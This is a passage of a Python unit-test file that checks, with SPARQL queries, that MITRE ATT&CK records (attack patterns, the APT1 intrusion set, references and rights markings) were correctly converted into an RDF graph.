initNs = { "cti": rdf.CTI, "dcterms": DCTERMS, "dc": DC, "attack": model.ns, "core": rdf.CORE, "foaf": FOAF, "skos": SKOS })
return model.graph.query(pq)
########
def test_exists_enterprise_catalog_id(attack_pattern):
qres = ask(attack_pattern, "?subject a cti:EnterpriseCatalog .")
assert bool(qres)
def test_attack_pattern_id(attack_pattern):
qres = ask(attack_pattern, "?subject a cti:AttackPattern; dcterms:identifier \"attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7\" .")
assert bool(qres)
def test_attack_pattern_created(attack_pattern):
qres = ask(attack_pattern, "?subject a cti:AttackPattern; dcterms:created \"2020-03-02T19:15:44.182000+00:00\"^^xsd:dateTime .")
assert bool(qres)
def test_attack_pattern_creator(attack_pattern):
qres = ask(attack_pattern, "?subject a cti:AttackPattern; dcterms:creator attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 .")
assert bool(qres)
def test_attack_pattern_modifed(attack_pattern):
qres = ask(attack_pattern, "?subject a cti:AttackPattern; dcterms:modified \"2020-10-18T01:53:39.818000+00:00\"^^xsd:dateTime .")
assert bool(qres)
def test_attack_pattern_rights(attack_pattern):
qres = ask(attack_pattern, "?subject a cti:AttackPattern; dcterms:rights attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 .")
assert bool(qres)
def test_attack_pattern_title(attack_pattern):
qres = ask(attack_pattern, "?subject a cti:AttackPattern; skos:prefLabel \"Spearphishing Link\" .")
assert bool(qres)
def test_attack_pattern_references_1(attack_pattern):
qres = ask(attack_pattern, "?subject a cti:AttackPattern; dcterms:references attack:ref_68633290849cc1e088bf2f49788d0f159e24afd60038d6ccaca5adfb977a07ac .")
assert bool(qres)
def test_attack_pattern_references_2(attack_pattern):
qres = ask(attack_pattern, "?subject a cti:AttackPattern; dcterms:references attack:ref_adec923c37ebdc6f054399e252eb9e8de7caaded59bf5466ac5242f81857233f .")
assert bool(qres)
def test_attack_pattern_references_3(attack_pattern):
qres = ask(attack_pattern, "?subject a cti:AttackPattern; dcterms:references attack:ref_e6686c72e4cfda456dd06fa2fb3c02356d1df27fad1542713cc3f9b116420d96 .")
assert bool(qres)
def test_attack_pattern_description(attack_pattern):
qres = ask(attack_pattern, "?subject a cti:AttackPattern; skos:definition ?description .")
assert bool(qres)
def test_ref_1(attack_pattern):
qres = ask(attack_pattern, "attack:ref_68633290849cc1e088bf2f49788d0f159e24afd60038d6ccaca5adfb977a07ac a dcterms:BibliographicResource.")
assert bool(qres)
def test_ref_1_ext_id(attack_pattern):
qres = ask(attack_pattern, "attack:ref_68633290849cc1e088bf2f49788d0f159e24afd60038d6ccaca5adfb977a07ac a dcterms:BibliographicResource; core:externalID \"CAPEC-163\".")
assert bool(qres)
def test_ref_1_refsource(attack_pattern):
qres = ask(attack_pattern, "attack:ref_68633290849cc1e088bf2f49788d0f159e24afd60038d6ccaca5adfb977a07ac a dcterms:BibliographicResource; cti:referenceSource \"capec\".")
assert bool(qres)
def test_ref_1_id(attack_pattern):
qres = ask(attack_pattern, "attack:ref_68633290849cc1e088bf2f49788d0f159e24afd60038d6ccaca5adfb977a07ac a dcterms:BibliographicResource; dcterms:identifier \"capec--capec-163\"^^xsd:NMTOKEN.")
assert bool(qres)
def test_ref_1_source(attack_pattern):
qres = ask(attack_pattern, "attack:ref_68633290849cc1e088bf2f49788d0f159e24afd60038d6ccaca5adfb977a07ac a dcterms:BibliographicResource; dcterms:source \"https://capec.mitre.org/data/definitions/163.html\"^^xsd:anyURI.")
assert bool(qres)
def test_ref_2(attack_pattern):
qres = ask(attack_pattern, "attack:ref_adec923c37ebdc6f054399e252eb9e8de7caaded59bf5466ac5242f81857233f a dcterms:BibliographicResource.")
assert bool(qres)
def test_ref_2_ext_id(attack_pattern):
qres = ask(attack_pattern, "attack:ref_adec923c37ebdc6f054399e252eb9e8de7caaded59bf5466ac5242f81857233f a dcterms:BibliographicResource; core:externalID \"T1566.002\".")
assert bool(qres)
def test_ref_2_refsource(attack_pattern):
qres = ask(attack_pattern, "attack:ref_adec923c37ebdc6f054399e252eb9e8de7caaded59bf5466ac5242f81857233f a dcterms:BibliographicResource; cti:referenceSource \"mitre-attack\".")
assert bool(qres)
def test_ref_2_id(attack_pattern):
qres = ask(attack_pattern, "attack:ref_adec923c37ebdc6f054399e252eb9e8de7caaded59bf5466ac5242f81857233f a dcterms:BibliographicResource; dcterms:identifier \"mitre-attack--t1566.002\"^^xsd:NMTOKEN.")
assert bool(qres)
def test_ref_2_source(attack_pattern):
qres = ask(attack_pattern, "attack:ref_adec923c37ebdc6f054399e252eb9e8de7caaded59bf5466ac5242f81857233f a dcterms:BibliographicResource; dcterms:source \"https://attack.mitre.org/techniques/T1566/002\"^^xsd:anyURI.")
assert bool(qres)
def test_ref_3(attack_pattern):
qres = ask(attack_pattern, "attack:ref_e6686c72e4cfda456dd06fa2fb3c02356d1df27fad1542713cc3f9b116420d96 a dcterms:BibliographicResource.")
assert bool(qres)
def test_ref_3_bib(attack_pattern):
qres = ask(attack_pattern, "attack:ref_e6686c72e4cfda456dd06fa2fb3c02356d1df27fad1542713cc3f9b116420d96 a dcterms:BibliographicResource; dcterms:bibliographicCitation \"Hacquebord, F.. (2017, April 25). Pawn Storm Abuses Open Authentication in Advanced Social Engineering Attacks. Retrieved October 4, 2019.\".")
assert bool(qres)
def test_ref_3_refsource(attack_pattern):
qres = ask(attack_pattern, "attack:ref_e6686c72e4cfda456dd06fa2fb3c02356d1df27fad1542713cc3f9b116420d96 a dcterms:BibliographicResource; cti:referenceSource \"Trend Micro Pawn Storm OAuth 2017\".")
assert bool(qres)
def test_ref_3_id(attack_pattern):
qres = ask(attack_pattern, "attack:ref_e6686c72e4cfda456dd06fa2fb3c02356d1df27fad1542713cc3f9b116420d96 a dcterms:BibliographicResource; dcterms:identifier \"trend-micro-pawn-storm-oauth-2017\"^^xsd:NMTOKEN.")
assert bool(qres)
def test_ref_3_source(attack_pattern):
qres = ask(attack_pattern, "attack:ref_e6686c72e4cfda456dd06fa2fb3c02356d1df27fad1542713cc3f9b116420d96 a dcterms:BibliographicResource; dcterms:source \"https://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-abuses-open-authentication-advanced-social-engineering-attacks\"^^xsd:anyURI.")
assert bool(qres)
def test_identity(attack_pattern):
qres = ask(attack_pattern, "attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 a foaf:Organization .")
assert bool(qres)
def test_identity_created(attack_pattern):
qres = ask(attack_pattern, "attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 a foaf:Organization; dcterms:created \"2017-06-01T00:00:00+00:00\"^^xsd:dateTime.")
assert bool(qres)
def test_identity_identifier(attack_pattern):
qres = ask(attack_pattern, "attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 a foaf:Organization; dcterms:identifier \"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5\".")
assert bool(qres)
def test_identity_modified(attack_pattern):
qres = ask(attack_pattern, "attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 a foaf:Organization; dcterms:modified \"2017-06-01T00:00:00+00:00\"^^xsd:dateTime .")
assert bool(qres)
def test_identity_rights(attack_pattern):
qres = ask(attack_pattern, "attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 a foaf:Organization; dcterms:rights attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168.")
assert bool(qres)
def test_identity_title(attack_pattern):
qres = ask(attack_pattern, "attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 a foaf:Organization; skos:prefLabel \"The MITRE Corporation\" .")
assert bool(qres)
def test_marking(attack_pattern):
qres = ask(attack_pattern, "attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 a dcterms:RightsStatement .")
assert bool(qres)
def test_marking_rights(attack_pattern):
qres = ask(attack_pattern, "attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 a dcterms:RightsStatement; dc:rights \"Copyright 2015-2020, The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation.\" .")
assert bool(qres)
def test_marking_rights_statement(attack_pattern):
qres = ask(attack_pattern, "attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 a dcterms:RightsStatement; dcterms:created \"2017-06-01T00:00:00+00:00\"^^xsd:dateTime .")
assert bool(qres)
def test_marking_creator(attack_pattern):
qres = ask(attack_pattern, "attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 a dcterms:RightsStatement; dcterms:creator attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 .")
assert bool(qres)
def test_marking_id(attack_pattern):
qres = ask(attack_pattern, "attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 a dcterms:RightsStatement; dcterms:identifier \"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168\" .")
assert bool(qres)
##
def test_intrusion_set_0(intrusion_set):
qres = ask(intrusion_set, "attack:intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662 a cti:IntrusionSet .")
assert bool(qres)
def test_intrusion_set_1(intrusion_set):
qres = ask(intrusion_set, "attack:intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662 a cti:IntrusionSet; dcterms:created \"2017-05-31T21:31:47.955000+00:00\"^^xsd:dateTime .")
assert bool(qres)
def test_intrusion_set_2(intrusion_set):
qres = ask(intrusion_set, "attack:intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662 a cti:IntrusionSet; dcterms:creator attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 .")
assert bool(qres)
def test_intrusion_set_3(intrusion_set):
qres = ask(intrusion_set, "attack:intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662 a cti:IntrusionSet; skos:definition \"[APT1](https://attack.mitre.org/groups/G0006) is a Chinese threat group that has been attributed to the 2nd Bureau of the People’s Liberation Army (PLA) General Staff Department’s (GSD) 3rd Department, commonly known by its Military Unit Cover Designator (MUCD) as Unit 61398. (Citation: Mandiant APT1)\" .")
assert bool(qres)
def test_intrusion_set_4(intrusion_set):
qres = ask(intrusion_set, "attack:intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662 a cti:IntrusionSet; dcterms:identifier \"intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662\" .")
assert bool(qres)
def test_intrusion_set_5(intrusion_set):
qres = ask(intrusion_set, "attack:intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662 a cti:IntrusionSet; dcterms:modified \"2020-10-22T18:35:55.290000+00:00\"^^xsd:dateTime .")
assert bool(qres)
def test_intrusion_set_6(intrusion_set):
qres = ask(intrusion_set, "attack:intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662 a cti:IntrusionSet; dcterms:references attack:ref_0558bfef1eddacb157bc5a88a175f04d216e2085bbf939e6607cdd971d6ed47b .")
assert bool(qres)
def test_intrusion_set_7(intrusion_set):
qres = ask(intrusion_set, "attack:intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662 a cti:IntrusionSet; dcterms:references attack:ref_26f4364de3ca2f5fc60ee8d1ca65f762a76349c58549a48730b6f85e8870e2b3 .")
assert bool(qres)
def test_intrusion_set_8(intrusion_set):
qres = ask(intrusion_set, "attack:intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662 a cti:IntrusionSet; dcterms:references attack:ref_62d45302b09f01d123c39945b81cc543b5fc4e9140da4dcf2b104c5267aa4ad8.")
assert bool(qres)
def test_intrusion_set_9(intrusion_set):
qres = ask(intrusion_set, "attack:intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662 a cti:IntrusionSet; dcterms:references attack:ref_65dd33aa6c6f7c1514b96641e57344ca19f5cd06e50a0689c90b44e88ddf0545 .")
assert bool(qres)
def test_intrusion_set_10(intrusion_set):
qres = ask(intrusion_set, "attack:intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662 a cti:IntrusionSet; dcterms:references attack:ref_760f53abb9bccf4b1f43fef0756d620c65579589e981699462d8233d8e4187bb .")
assert bool(qres)
def test_intrusion_set_11(intrusion_set):
qres = ask(intrusion_set, "attack:intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662 a cti:IntrusionSet; dcterms:references attack:ref_7617d39b304c1ef73796e8c755992fd9f756dc7dd1dede37ecf61a9045a8a9f7 .")
assert bool(qres)
def test_intrusion_set_12(intrusion_set):
qres = ask(intrusion_set, "attack:intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662 a cti:IntrusionSet; dcterms:references attack:ref_8c47999bd05fc33de7c7a7f07a4ef43a471173a4a37fba16414a8ce7e07c221f .")
assert bool(qres)
def test_intrusion_set_13(intrusion_set):
qres = ask(intrusion_set, "attack:intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662 a cti:IntrusionSet; dcterms:rights attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 .")
assert bool(qres)
def test_intrusion_set_14(intrusion_set):
qres = ask(intrusion_set, "attack:intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662 a cti:IntrusionSet; skos:prefLabel \"APT1\" .")
assert bool(qres)
def test_intrusion_set_15(intrusion_set):
qres = ask(intrusion_set, "attack:ref_0558bfef1eddacb157bc5a88a175f04d216e2085bbf939e6607cdd971d6ed47b a dcterms:BibliographicResource .")
assert bool(qres)
def test_intrusion_set_16(intrusion_set):
qres = ask(intrusion_set, "attack:ref_0558bfef1eddacb157bc5a88a175f04d216e2085bbf939e6607cdd971d6ed47b a dcterms:BibliographicResource; cti:referenceSource \"Mandiant APT1\" .")
assert bool(qres)
def test_intrusion_set_17(intrusion_set):
qres = ask(intrusion_set, "attack:ref_0558bfef1eddacb157bc5a88a175f04d216e2085bbf939e6607cdd971d6ed47b a dcterms:BibliographicResource; dcterms:bibliographicCitation \"Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage Units. Retrieved July 18, 2016.\" .")
assert bool(qres)
def test_intrusion_set_18(intrusion_set):
qres = ask(intrusion_set, "attack:ref_0558bfef1eddacb157bc5a88a175f04d216e2085bbf939e6607cdd971d6ed47b a dcterms:BibliographicResource; dcterms:identifier \"mandiant-apt1\"^^xsd:NMTOKEN .")
assert bool(qres)
def test_intrusion_set_19(intrusion_set):
qres = ask(intrusion_set, "attack:ref_0558bfef1eddacb157bc5a88a175f04d216e2085bbf939e6607cdd971d6ed47b a dcterms:BibliographicResource; dcterms:source \"https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf\"^^xsd:anyURI .")
assert bool(qres)
def test_intrusion_set_20(intrusion_set):
qres = ask(intrusion_set, "attack:ref_26f4364de3ca2f5fc60ee8d1ca65f762a76349c58549a48730b6f85e8870e2b3 a dcterms:BibliographicResource .")
assert bool(qres)
def test_intrusion_set_21(intrusion_set):
qres = ask(intrusion_set, "attack:ref_26f4364de3ca2f5fc60ee8d1ca65f762a76349c58549a48730b6f85e8870e2b3 a dcterms:BibliographicResource; cti:referenceSource \"CrowdStrike Putter Panda\" .")
assert bool(qres)
def test_intrusion_set_22(intrusion_set):
qres = ask(intrusion_set, "attack:ref_26f4364de3ca2f5fc60ee8d1ca65f762a76349c58549a48730b6f85e8870e2b3 a dcterms:BibliographicResource; dcterms:bibliographicCitation \"Crowdstrike Global Intelligence Team. (2014, June 9). CrowdStrike Intelligence Report: Putter Panda. Retrieved January 22, 2016.\" .")
assert bool(qres)
def test_intrusion_set_23(intrusion_set):
qres = ask(intrusion_set, "attack:ref_26f4364de3ca2f5fc60ee8d1ca65f762a76349c58549a48730b6f85e8870e2b3 a dcterms:BibliographicResource; dcterms:identifier \"crowdstrike-putter-panda\"^^xsd:NMTOKEN .")
assert bool(qres)
def test_intrusion_set_24(intrusion_set):
qres = ask(intrusion_set, "attack:ref_26f4364de3ca2f5fc60ee8d1ca65f762a76349c58549a48730b6f85e8870e2b3 a dcterms:BibliographicResource; dcterms:source \"http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf\"^^xsd:anyURI .")
assert bool(qres)
def test_intrusion_set_25(intrusion_set):
qres = ask(intrusion_set, "attack:ref_62d45302b09f01d123c39945b81cc543b5fc4e9140da4dcf2b104c5267aa4ad8 a dcterms:BibliographicResource .")
assert bool(qres)
def test_intrusion_set_26(intrusion_set):
qres = ask(intrusion_set, "attack:ref_62d45302b09f01d123c39945b81cc543b5fc4e9140da4dcf2b104c5267aa4ad8 a dcterms:BibliographicResource; cti:referenceSource \"Comment Panda\" .")
assert bool(qres)
def test_intrusion_set_27(intrusion_set):
qres = ask(intrusion_set, "attack:ref_62d45302b09f01d123c39945b81cc543b5fc4e9140da4dcf2b104c5267aa4ad8 a dcterms:BibliographicResource; dcterms:bibliographicCitation \"(Citation: CrowdStrike Putter Panda)\" .")
assert bool(qres)
def test_intrusion_set_28(intrusion_set):
qres = ask(intrusion_set, "attack:ref_62d45302b09f01d123c39945b81cc543b5fc4e9140da4dcf2b104c5267aa4ad8 a dcterms:BibliographicResource; dcterms:identifier \"comment-panda\"^^xsd:NMTOKEN .")
assert bool(qres)
def test_intrusion_set_29(intrusion_set):
qres = ask(intrusion_set, "attack:ref_65dd33aa6c6f7c1514b96641e57344ca19f5cd06e50a0689c90b44e88ddf0545 a dcterms:BibliographicResource .")
assert bool(qres)
def test_intrusion_set_30(intrusion_set):
qres = ask(intrusion_set, "attack:ref_65dd33aa6c6f7c1514b96641e57344ca19f5cd06e50a0689c90b44e88ddf0545 a dcterms:BibliographicResource; cti:referenceSource \"Comment Group\" .")
assert bool(qres)
def test_intrusion_set_31(intrusion_set):
qres = ask(intrusion_set, "attack:ref_65dd33aa6c6f7c1514b96641e57344ca19f5cd06e50a0689c90b44e88ddf0545 a dcterms:BibliographicResource; dcterms:bibliographicCitation \"(Citation: Mandiant APT1)\" .")
assert bool(qres)
def test_intrusion_set_32(intrusion_set):
qres = ask(intrusion_set, "attack:ref_65dd33aa6c6f7c1514b96641e57344ca19f5cd06e50a0689c90b44e88ddf0545 a dcterms:BibliographicResource; dcterms:identifier \"comment-group\"^^xsd:NMTOKEN .")
assert bool(qres)
def test_intrusion_set_33(intrusion_set):
qres = ask(intrusion_set, "attack:ref_760f53abb9bccf4b1f43fef0756d620c65579589e981699462d8233d8e4187bb a dcterms:BibliographicResource .")
assert bool(qres)
def test_intrusion_set_34(intrusion_set):
qres = ask(intrusion_set, "attack:ref_760f53abb9bccf4b1f43fef0756d620c65579589e981699462d8233d8e4187bb a dcterms:BibliographicResource; cti:referenceSource \"Comment Crew\" .")
assert bool(qres)
def test_intrusion_set_35(intrusion_set):
qres = ask(intrusion_set, "attack:ref_760f53abb9bccf4b1f43fef0756d620c65579589e981699462d8233d8e4187bb a dcterms:BibliographicResource; dcterms:bibliographicCitation \"(Citation: Mandiant APT1)\" .")
assert bool(qres)
def test_intrusion_set_36(intrusion_set):
qres = ask(intrusion_set, "attack:ref_760f53abb9bccf4b1f43fef0756d620c65579589e981699462d8233d8e4187bb a dcterms:BibliographicResource; dcterms:identifier \"comment-crew\"^^xsd:NMTOKEN.")
assert bool(qres)
def test_intrusion_set_37(intrusion_set):
qres = ask(intrusion_set, "attack:ref_7617d39b304c1ef73796e8c755992fd9f756dc7dd1dede37ecf61a9045a8a9f7 a dcterms:BibliographicResource .")
assert bool(qres)
def test_intrusion_set_38(intrusion_set):
qres = ask(intrusion_set, "attack:ref_7617d39b304c1ef73796e8c755992fd9f756dc7dd1dede37ecf61a9045a8a9f7 a dcterms:BibliographicResource; core:externalID \"G0006\" .")
assert bool(qres)
def test_intrusion_set_39(intrusion_set):
qres = ask(intrusion_set, "attack:ref_7617d39b304c1ef73796e8c755992fd9f756dc7dd1dede37ecf61a9045a8a9f7 a dcterms:BibliographicResource; cti:referenceSource \"mitre-attack\" .")
assert bool(qres)
def test_intrusion_set_40(intrusion_set):
qres = ask(intrusion_set, "attack:ref_7617d39b304c1ef73796e8c755992fd9f756dc7dd1dede37ecf61a9045a8a9f7 a dcterms:BibliographicResource; dcterms:identifier \"mitre-attack--g0006\"^^xsd:NMTOKEN .")
assert bool(qres)
def test_intrusion_set_41(intrusion_set):
qres = ask(intrusion_set, "attack:ref_7617d39b304c1ef73796e8c755992fd9f756dc7dd1dede37ecf61a9045a8a9f7 a dcterms:BibliographicResource; dcterms:source \"https://attack.mitre.org/groups/G0006\"^^xsd:anyURI .")
assert bool(qres)
def test_intrusion_set_42(intrusion_set):
qres = ask(intrusion_set, "attack:ref_8c47999bd05fc33de7c7a7f07a4ef43a471173a4a37fba16414a8ce7e07c221f a dcterms:BibliographicResource .")
assert bool(qres)
def test_intrusion_set_43(intrusion_set):
qres = ask(intrusion_set, "attack:ref_8c47999bd05fc33de7c7a7f07a4ef43a471173a4a37fba16414a8ce7e07c221f a dcterms:BibliographicResource; cti:referenceSource \"APT1\" .")
assert bool(qres)
def test_intrusion_set_44(intrusion_set):
qres = ask(intrusion_set, "attack:ref_8c47999bd05fc33de7c7a7f07a4ef43a471173a4a37fba16414a8ce7e07c221f a dcterms:BibliographicResource; dcterms:bibliographicCitation \"(Citation: Mandiant APT1)\" .")
assert bool(qres)
def test_intrusion_set_45(intrusion_set):
qres = ask(intrusion_set, "attack:ref_8c47999bd05fc33de7c7a7f07a4ef43a471173a4a37fba16414a8ce7e07c221f a dcterms:BibliographicResource; dcterms:identifier \"apt1\"^^xsd:NMTOKEN .")
assert bool(qres)
def test_intrusion_set_46(intrusion_set):
qres = ask(intrusion_set, "attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 a foaf:Organization .")
assert bool(qres)
def test_intrusion_set_47(intrusion_set):
qres = ask(intrusion_set, "attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 a foaf:Organization; dcterms:created \"2017-06-01T00:00:00+00:00\"^^xsd:dateTime .")
assert bool(qres)
def test_intrusion_set_48(intrusion_set):
qres = ask(intrusion_set, "attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 a foaf:Organization; dcterms:identifier \"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5\" .")
assert bool(qres)
def test_intrusion_set_49(intrusion_set):
qres = ask(intrusion_set, "attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 a foaf:Organization; dcterms:modified \"2017-06-01T00:00:00+00:00\"^^xsd:dateTime .")
assert bool(qres)
def test_intrusion_set_50(intrusion_set):
qres = ask(intrusion_set, "attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 a foaf:Organization; dcterms:rights attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 .")
assert bool(qres)
def test_intrusion_set_51(intrusion_set):
qres = ask(intrusion_set, "attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 a foaf:Organization; skos:prefLabel \"The MITRE Corporation\" .")
assert bool(qres)
def test_intrusion_set_52(intrusion_set):
qres = ask(intrusion_set, "attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 a dcterms:RightsStatement .")
assert bool(qres)
def test_intrusion_set_53(intrusion_set):
qres = ask(intrusion_set, "attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 a dcterms:RightsStatement; dc:rights \"Copyright 2015-2020, The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation.\" .")
assert bool(qres)
def test_intrusion_set_54(intrusion_set):
qres = ask(intrusion_set, "attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 a dcterms:RightsStatement; dcterms:created \"2017-06-01T00:00:00+00:00\"^^xsd:dateTime .")
assert bool(qres)
def test_intrusion_set_55(intrusion_set):
qres = ask(intrusion_set, "attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 a dcterms:RightsStatement; dcterms:creator attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 .")
assert bool(qres)
def test_intrusion_set_56(intrusion_set):
qres = ask(intrusion_set, "attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 a dcterms:RightsStatement; dcterms:identifier \"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168\" .")
assert bool(qres)
def test_pre_0(pre):
qres = ask(pre, "attack:attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2 a cti:AttackPattern .")
assert bool(qres)
def test_pre_1(pre):
qres = ask(pre, "attack:attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2 a cti:AttackPattern; cti:killChainPhase attack:kill-chain-phase__mitre-attack__resource-development .")
assert bool(qres)
def test_pre_2(pre):
qres = ask(pre, "attack:attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2 a cti:AttackPattern; dcterms:created \"2020-09-30T16:37:40.271000+00:00\"^^xsd:dateTime .")
assert bool(qres)
def test_pre_3(pre):
qres = ask(pre, "attack:attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2 a cti:AttackPattern; dcterms:creator attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 .")
assert bool(qres)
def test_pre_4(pre):
qres = ask(pre, "attack:attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2 a cti:AttackPattern; skos:definition ?description .")
assert bool(qres)
def test_pre_5(pre):
qres = ask(pre, "attack:attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2 a cti:AttackPattern; dcterms:identifier \"attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2\" .")
assert bool(qres)
def test_pre_6(pre):
qres = ask(pre, "attack:attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2 a cti:AttackPattern; dcterms:modified \"2020-10-22T17:59:17.606000+00:00\"^^xsd:dateTime .")
assert bool(qres)
def test_pre_7(pre):
qres = ask(pre, "attack:attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2 a cti:AttackPattern; dcterms:references attack:ref_b2dc9c5822dfceab09c60c02ac3e77b2101c14c03ff1152315789dec1e42a22c .")
assert bool(qres)
def test_pre_8(pre):
qres = ask(pre, "attack:attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2 a cti:AttackPattern; dcterms:references attack:ref_ecc452824f05f3b2cfba1d9dab904885b6bb2b0fdd87ec1775571928ee8e65dd .")
assert bool(qres)
def test_pre_9(pre):
qres = ask(pre, "attack:attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2 a cti:AttackPattern; dcterms:rights attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 .")
assert bool(qres)
def test_pre_10(pre):
qres = ask(pre, "attack:attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2 a cti:AttackPattern; skos:prefLabel \"Acquire Infrastructure\" .")
assert bool(qres)
def test_pre_11(pre):
qres = ask(pre, "attack:kill-chain-phase__mitre-attack__resource-development a cti:KillChainPhase .")
assert bool(qres)
def test_pre_12(pre):
qres = ask(pre, "attack:kill-chain-phase__mitre-attack__resource-development a cti:KillChainPhase; cti:killChainName \"mitre-attack\" .")
assert bool(qres)
def test_pre_13(pre):
qres = ask(pre, "attack:kill-chain-phase__mitre-attack__resource-development a cti:KillChainPhase; skos:prefLabel \"resource-development\" .")
assert bool(qres)
def test_pre_14(pre):
qres = ask(pre, "attack:ref_b2dc9c5822dfceab09c60c02ac3e77b2101c14c03ff1152315789dec1e42a22c a dcterms:BibliographicResource .")
assert bool(qres)
def test_pre_15(pre):
qres = ask(pre, "attack:ref_b2dc9c5822dfceab09c60c02ac3e77b2101c14c03ff1152315789dec1e42a22c a dcterms:BibliographicResource; core:externalID \"T1583\" .")
assert bool(qres)
def test_pre_16(pre):
qres = ask(pre, "attack:ref_b2dc9c5822dfceab09c60c02ac3e77b2101c14c03ff1152315789dec1e42a22c a dcterms:BibliographicResource; cti:referenceSource \"mitre-attack\" .")
assert bool(qres)
def test_pre_17(pre):
qres = ask(pre, "attack:ref_b2dc9c5822dfceab09c60c02ac3e77b2101c14c03ff1152315789dec1e42a22c a dcterms:BibliographicResource; dcterms:identifier \"mitre-attack--t1583\"^^xsd:NMTOKEN .")
assert bool(qres)
def test_pre_18(pre):
qres = ask(pre, "attack:ref_b2dc9c5822dfceab09c60c02ac3e77b2101c14c03ff1152315789dec1e42a22c a dcterms:BibliographicResource; dcterms:source \"https://attack.mitre.org/techniques/T1583\"^^xsd:anyURI .")
assert bool(qres)
def test_pre_19(pre):
qres = ask(pre, "attack:ref_ecc452824f05f3b2cfba1d9dab904885b6bb2b0fdd87ec1775571928ee8e65dd a dcterms:BibliographicResource .")
assert bool(qres)
def test_pre_20(pre):
qres = ask(pre, "attack:ref_ecc452824f05f3b2cfba1d9dab904885b6bb2b0fdd87ec1775571928ee8e65dd a dcterms:BibliographicResource; cti:referenceSource \"TrendmicroHideoutsLease\" .")
assert bool(qres)
def test_pre_21(pre):
qres = ask(pre, "attack:ref_ecc452824f05f3b2cfba1d9dab904885b6bb2b0fdd87ec1775571928ee8e65dd a dcterms:BibliographicResource; dcterms:bibliographicCitation \"Max Goncharov. (2015, July 15). Criminal Hideouts for Lease: Bulletproof Hosting Services. Retrieved March 6, 2017.\" .")
assert bool(qres)
def test_pre_22(pre):
qres = ask(pre, "attack:ref_ecc452824f05f3b2cfba1d9dab904885b6bb2b0fdd87ec1775571928ee8e65dd a dcterms:BibliographicResource; dcterms:identifier \"trendmicrohideoutslease\"^^xsd:NMTOKEN .")
assert bool(qres)
def test_pre_23(pre):
